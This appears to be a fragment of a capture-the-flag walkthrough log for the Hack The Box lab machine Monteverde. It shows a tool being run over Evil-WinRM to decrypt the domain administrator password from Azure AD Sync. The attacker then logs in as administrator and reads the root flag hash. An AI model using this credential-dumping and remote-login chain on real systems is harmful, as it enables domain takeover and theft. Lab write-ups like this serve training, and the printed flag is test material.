*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\ADdecrypt\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> 

trying evilwinrm

┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ evil-winrm -i  10.10.10.172 -u administrator -p d0m@in4dminyeah!
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f77447ffe7a3e4cb40da45e8d46202ec
*Evil-WinRM* PS C:\Users\Administrator\Desktop>